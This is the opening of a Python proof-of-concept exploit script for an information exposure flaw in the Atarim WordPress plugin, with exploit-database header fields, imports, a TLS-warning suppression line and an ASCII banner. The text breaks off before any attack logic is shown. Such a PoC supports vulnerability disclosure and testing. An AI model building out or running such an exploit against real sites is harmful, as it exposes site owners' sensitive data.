Atarim WordPress Plugin 4.2.2 – Sensitive Information Exposure
Proof of Concept (PoC)
poc.py
# Exploit Title: Atarim WordPress Plugin 4.2.2 - Sensitive Information Exposure
# Google Dork: N/A
# Date: 2026-07-05
# Exploit Author: Mohammad Hossein Sadeghian
# Vendor Homepage: https://atarim.io/
# Software Link: https://wordpress.org/plugins/atarim/
# Version: < 4.2.2
# Tested on: Ubuntu 22.04 LTS, Apache 2.4, PHP 8.2, WordPress 6.7
# CVE: CVE-2025-60188
import requests
import hashlib
import hmac
import json
import sys
import urllib3
import re
import time
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def print_banner():
banner = r"""
____ __ _ __ __
/ __ ________ ____ _____/ / / | / /__ / /_
/ / / / ___/ _ / __ / __ / / |/ / _ / __/
/ /_/ / / / __/ /_/ / /_/ / / /| / __/ /_
/_____/_/ ___/__,_/__,_/ /_/ |_/___/__/
Author: m4sh_wacker
"""
print(banner)
class Colors:
HEADER = '